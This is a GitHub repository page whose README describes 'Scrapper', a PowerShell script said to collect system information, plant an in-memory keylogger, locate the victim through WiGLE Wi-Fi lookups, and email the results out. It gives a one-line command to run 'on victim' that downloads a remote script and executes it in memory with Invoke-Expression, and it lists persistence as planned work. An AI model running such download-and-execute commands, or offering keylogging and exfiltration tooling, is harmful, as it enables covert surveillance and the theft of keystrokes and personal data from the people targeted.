Skip to content

Powershell scripts containing various utilitites usefull for pentests

License

Notifications You must be signed in to change notification settings

axano/powershellScripts

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

49 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

powershellScripts

Scrapper

Powershell script that

  • Gathers info
  • Plants a in memory kelyogger
  • Finds the geolocation of the client through querrying the AP name in the Wiggle database
  • Sends all info through email back

How to use

  • Fork project to own github so you can change the needed variables
  • Change the wiggle api key (optional if you dont need geolocation)
  • Change the receiver email in both scrapper.ps1 and mailer.ps1
  • Run in powershell on victim :

Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/yourGithubRepo/master/scrapper.ps1')

TODO

  • Add persistence

About

Powershell scripts containing various utilitites usefull for pentests

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published